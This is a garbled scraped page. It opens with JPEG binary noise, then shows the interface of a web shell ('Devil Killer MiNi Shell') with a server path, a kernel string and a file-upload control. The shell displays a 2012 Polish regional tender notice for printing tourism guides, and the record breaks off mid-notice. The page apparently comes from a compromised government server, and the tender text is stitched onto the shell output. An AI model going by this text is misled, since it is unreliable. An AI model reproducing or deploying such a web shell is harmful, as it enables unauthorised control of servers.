JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120228/46759-N-2012.html

<p class="kh_header"><b>Kielce: USŁUGĘ OPRACOWANIA MERYTORYCZNEGO, GRAFICZNEGO, SKŁADU, DRUKU I DOSTAWY WYDAWNICTW PROMUJĄCYCH WALORY TURYSTYCZNE WOJEWÓDZTWA ŚWIĘTOKRZYSKIEGO ORAZ ZAPROSZEŃ I PLAKATÓW NA IMPREZY ORGANIZOWANE PRZEZ SAMORZĄD WOJEWÓDZTWA ŚWIĘTOKRZYSKIEGO</b><br>
<b>Numer ogłoszenia: 46759 - 2012; data zamieszczenia: 28.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 41 3421901, 3421677, 3421576, faks 41 3445265, 3445723.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGĘ OPRACOWANIA MERYTORYCZNEGO, GRAFICZNEGO, SKŁADU, DRUKU I DOSTAWY WYDAWNICTW PROMUJĄCYCH WALORY TURYSTYCZNE WOJEWÓDZTWA ŚWIĘTOKRZYSKIEGO ORAZ ZAPROSZEŃ I PLAKATÓW NA IMPREZY ORGANIZOWANE PRZEZ SAMORZĄD WOJEWÓDZTWA ŚWIĘTOKRZYSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa opracowania merytorycznego, graficznego, składu, korekty, naświetlania i druku wydawnictw promujących walory turystyczne województwa świętokrzyskiego oraz zaproszeń i plakatów na imprezy organizowane przez Samorząd Województwa Świętokrzyskiego wraz z ich dostarczeniem do siedziby Zamawiającego w Kielcach przy ul. Paderewskiego 34A, 25 - 502 Kielce, oraz rozładunkiem przez Wykonawcę w miejscach wskazanych przez Zamawiającego, wg wyszczególnienia: 
I CZĘŚĆ ZAMÓWIENIA
a)	Informator turystyczny Województwa Świętokrzyskiego - w nakładzie 2 000 egzemplarzy (1 500 - wersja polska, 500 - wersja angielska); 
b)	Przewodnik Świętokrzyskie Zabytki Techniki -  w nakładzie 3 000 egzemplarzy;
II CZĘŚĆ ZAMÓWIENIA
Przewodnik Pieszo po Górach Świętokrzyskich w nakładzie:
-przewodnik książkowy w zestawie z 5 arkuszami laminowanych map - 3 000 egzemplarzy
-prezentacja przewodnika w formie aplikacji na telefon komórkowy w systemie Android - 1 sztuka
III CZĘŚĆ ZAMÓWIENIA
a)	Świętokrzyski paszport turystyczny - w nakładzie 15 000 egzemplarzy;
b)	Zaproszenia:
-Inauguracja sezonu turystycznego - w nakładzie 300 sztuk;
-Światowy Dzień Turystyki - Obchody Wojewódzkie - w nakładzie 300 sztuk;
-Świętokrzyski Jarmark Agroturystyczny - 500 sztuk;
c)	 Plakaty - Świętokrzyski Jarmark Agroturystyczny w nakładzie:
-Format A2 - 200 sztuk,
-Format B1 - 100 sztuk.
2.	Zamawiający podzielił niniejsze zamówienie na 3 części i dopuszcza składanie ofert częściowych. Wykonawcy mogą złożyć ofertę na wszystkie lub wybrane części zamówienia.  
3.	Szczegółowy opis przedmiotu zamówienia (dla każdej części zamówienia) zawierają odpowiednio Załączniki Nr 1A, 1B i 1C do SIWZ oraz Załącznik Nr 2 do SIWZ Standaryzacja regionalnych materiałów promocyjnych i tablic informacyjnych, gdzie określone zostały wytyczne szat graficznych wydawnictw..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy, o wartości do 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-7, 79.81.00.00-5, 79.82.20.00-2, 79.96.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda wniesienia przez Wykonawców wadium, którego wysokość ustalona została na kwotę:
- I część zamówienia: 1 200,00 złotych (słownie złotych: Tysiąc dwieście 00/100)
-II część zamówienia: 1 100,00 złotych (słownie złotych: Tysiąc sto 00/100)
-III część zamówienia: 400,00 złotych (słownie złotych: Czterysta 00/100)
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3.	Wadium musi być wniesione przez Wykonawców przed upływem terminu wyznaczonego do składania ofert. 
4.	W przypadku wnoszenia wadium w formie pieniądza liczy się termin wpływu środków na konto Zamawiającego (moment uznania konta Zamawiającego).
5.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego wg danych: 
a)	Nazwa banku i nr konta zamawiającego: 
		     Getin Noble Bank, 	45 1560 0013 2536 2450 5776 0005
b)	Nazwa i adres zamawiającego:
Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego,  al. IX Wieków Kielc 3, 25-516 Kielce
c)	Tytuł wpłaty: 
Wadium - przetarg nieograniczony na usługę opracowania merytorycznego, graficznego, składu, druku i dostawy wydawnictw promujących walory turystyczne województwa świętokrzyskiego oraz zaproszeń i plakatów na imprezy organizowane przez Samorząd Województwa Świętokrzyskiego
6.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
7.	Wadium wnoszone w formach, o których mowa w pkt 2 lit b - e musi wskazywać przedmiot zamówienia i zabezpieczać złożoną ofertę na cały okres, na jaki Wykonawca jest związany ofertą. Dokument taki musi zawierać nieodwołalne i bezwarunkowe zobowiązanie poręczyciela lub gwaranta wypłacenia Zamawiającemu, na pierwsze jego żądanie, kwoty wadium w przypadkach, o których mowa w art. 46 ust. 4a i 5 ustawy (pkt 13 niniejszego rozdziału). Dokument może zostać załączony do oferty lub może zostać złożony w oddzielnej kopercie w siedzibie Zamawiającego, pok. 146, przed upływem terminu wyznaczonego do składania ofert.
8.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy (pkt 13 lit. a niniejszego rozdziału).
9.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza w danej części zamówienia, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
10.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.	Zamawiający żądać będzie ponownego wniesienia wadium przez Wykonawcę któremu zwrócono wadium na podstawie pkt. 8, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
12.	Wadium wniesione w pieniądzu Zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 
13.	Zamawiający zatrzymuje wadium wraz z odsetkami, w następujących przypadkach:
a)	zgodnie z art. 46 ust. 4a ustawy - jeżeli Wykonawca w odpowiedzi na wezwanie Zamawiającego, o którym mowa w art. 26 ust. 3 ustawy, nie złożył wymaganych dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie,
b)	zgodnie z art. 46 ust. 5 ustawy  - jeżeli Wykonawca, którego oferta została wybrana:
-odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy
posiadają odpowiednią wiedzę i doświadczenie niezbędne do wykonania zamówienia, i w powyższym zakresie wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali z należytą starannością co najmniej:
-dla I części zamówienia - min. dwie usługi opracowania, składu i druku wydawnictw/publikacji o wartości brutto nie mniejszej niż 30 000,00 złotych każda, 
-dla II części zamówienia - min. dwie usługi opracowania, składu i druku wydawnictw/publikacji o wartości brutto nie mniejszej niż 20 000,00 złotych każda, 
-dla III części zamówienia - min. dwie usługi opracowania, składu i druku wydawnictw/publikacji o wartości brutto nie mniejszej niż 10 000,00 złotych każda. UWAGA 
1.	W przypadku składania oferty na więcej niż jedna część zamówienia Wykonawcy mogą posiadać wiedzę i doświadczenie przy wykonaniu min. dwóch usług opracowania, składu
 i druku wydawnictw/publikacji o wartości stanowiącej sumę kwot określonych dla wybranych części lub odrębnie po dwie usługi o wymaganych wartościach dla wybranych części zamówienia.
2.	W przypadku wykazania wartości danej usługi w walucie obcej, Zamawiający dokona przeliczenia tej wartości na wartość w złotych według średniego kursu Narodowego Banku Polskiego (NBP) dla danej waluty z dnia publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu ukazania się ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje.
Ocena w/w warunku udziału w postępowaniu będzie dokonywana według zasady spełnia/nie
spełnia, na podstawie Oświadczenia z art. 22 ust 1 ustawy Prawo zamówień publicznych i dokumentów
załączonych do oferty, które zostały wyszczególnione w pkt. III.4.1 oraz rozdziale VI. lit. A SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują odpowiednim potencjałem
technicznym. Ocena w/w warunków udziału w postępowaniu będzie dokonana według zasady
spełnia/nie spełnia, na podstawie Oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do
wykonania zamówienia. Ocena w/w warunku udziału w postępowaniu będzie dokonana według zasady
spełnia/nie spełnia, na podstawie Oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy znajdują się w sytuacji ekonomicznej i
finansowej zapewniającej wykonanie zamówienia. Ocena w/w warunku udziału w postępowaniu będzie
dokonana według zasady spełnia/nie spełnia, na podstawie Oświadczenia z art. 22 ust. 1 ustawy Prawo
zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony Formularz oferty - wg wzoru określonego w Dodatku nr 1 do SIWZ. 
2.	Wypełniony Formularz cenowy dotyczący części zamówienia, na którą składana jest oferta - wg wzoru określonego w Dodatku nr 2A, 2B i/lub 2C do SIWZ, który stanowić będzie odpowiedni załącznik do oferty Wykonawcy. 
3.	Wykonawca, który będzie polegać na wiedzy i doświadczeniu innych podmiotów (art. 26 ust. 2b) zobowiązany jest udowodnić Zamawiającemu iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając 
w tym celu pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia -oryginał podpisany przez podmiot. 
4.	W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawców występujących wspólnie (dotyczy również spółki cywilnej) - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (oryginał lub poświadczona notarialnie kopia). 
5.	Pełnomocnictwo określające jego zakres - w przypadku gdy Wykonawcę reprezentuje pełnomocnik (oryginał lub poświadczona notarialnie kopia). 
6.	W przypadku wnoszenia wadium w formie niepieniężnej (rozdział VIII, pkt 2 lit. b - e SIWZ) - oryginał dokumentu potwierdzającego wniesienie przez Wykonawcę wadium, w wymaganej wysokości dla odpowiedniej części zamówienia. Oryginał dokumentu może zostać dołączony do oferty lub może zostać złożony w siedzibie Zamawiającego, pok. 146, w oddzielnej kopercie, opisanej zgodnie z instrukcją zawartą w rozdziale X pkt 2 niniejszej SIWZ z dopiskiem WADIUM przed upływem terminu wyznaczonego do składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość zmian postanowień zawartych w Umowie dotyczących terminu wykonania Umowy, w przypadku działania siły wyższej, powodującej konieczność wprowadzenia zmian do Umowy. Przez działanie siły wyższej należy rozumieć zdarzenie bądź połączenie zdarzeń obiektywnie niezależnych od stron Umowy, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z Umowy, których strony Umowy nie mogły przewidzieć 
i którym nie mogły zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie 
z należytą starannością. Wykonawca jest zobowiązany niezwłocznie poinformować Zamawiającego o fakcie zaistnienia siły wyższej oraz wskazać zakres i wpływ, jakie zdarzenie miało na przebieg realizacji Przedmiotu Umowy. 
2. Zamawiający dopuszcza możliwość zmiany wynagrodzenia Wykonawcy po przeprowadzeniu negocjacji i zawarciu stosownego aneksu w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT dla przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.sejmik.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski
Województwa Świętokrzyskiego w Kielcach, al. IX Wieków Kielc 3, 25-516 Kielce, Budynek C-2, pokój 344 (III
piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2012 godzina 12:00, miejsce: Urząd Marszałkowski Województwa Świętokrzyskiego w Kielcach, al. IX Wieków Kielc 3,
25-516 Kielce, Budynek C-2, pokój 146 (Kancelaria Ogólna, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> INFORMATOR TURYSTYCZNY I PRZEWODNIK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia w I części zamówienia jest opracowanie merytoryczne, graficzne, korekta, skład, naświetlanie i druk wraz z pakowaniem i dostarczeniem do siedziby Zamawiającego, oraz rozładunkiem przez Wykonawcę w miejscach wskazanych przez Zamawiającego: 
a)	Informatora turystycznego Województwa Świętokrzyskiego - w nakładzie 2 000 egzemplarzy (1 500 - wersja polska, 500 - wersja angielska); 
b)	Przewodnika Świętokrzyskie Zabytki Techniki -  w nakładzie 3 000 egzemplarzy;
2.	Szczegółowy opis Części I zamówienia zawarty został w Załączniku Nr 1A do SIWZ. 
3.	W toku realizacji zamówienia Wykonawca będzie przeprowadzał z Zamawiającym konsultacje w zakresie opracowania merytorycznego, graficznego i składu przewodnika oraz informatora, a także będzie musiał uzyskać akceptację Zamawiającego ich ostatecznej wersji. 
4.	Miejscem dostarczenia wykonanego przedmiotu zamówienia jest siedziba Zamawiającego w Kielcach przy ul. Paderewskiego 34A, 25-502 Kielce (Departament Promocji, Edukacji, Kultury, Sportu i Turystyki)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-7, 79.81.00.00-5, 79.82.20.00-2, 79.82.30.00-9, 79.96.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PRZEWODNIK PIESZO PO GÓRACH ŚWIĘTOKRZYSKICH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia w II części zamówienia jest opracowanie, graficzne, korekta, skład, naświetlanie i druk papierowej wersji przewodnika Pieszo po Górach Świętokrzyskich w zestawie z 5 arkuszami laminowanych map w nakładzie 3 000 egzemplarzy oraz przygotowanie prezentacji przewodnika w formie aplikacji na telefon komórkowy w systemie Android, wraz z pakowaniem i dostarczeniem do siedziby Zamawiającego, oraz rozładunkiem przez Wykonawcę w miejscu wskazanym przez Zamawiającego.
2.	Szczegółowy opis Części II zamówienia zawarty został w Załączniku Nr 1B do SIWZ. 
3.	W toku realizacji zamówienia Wykonawca będzie przeprowadzał z Zamawiającym konsultacje w zakresie opracowania merytorycznego, graficznego i składu przewodnika, a także będzie musiał uzyskać akceptację Zamawiającego jego ostatecznej wersji 
w każdej z jego form. 
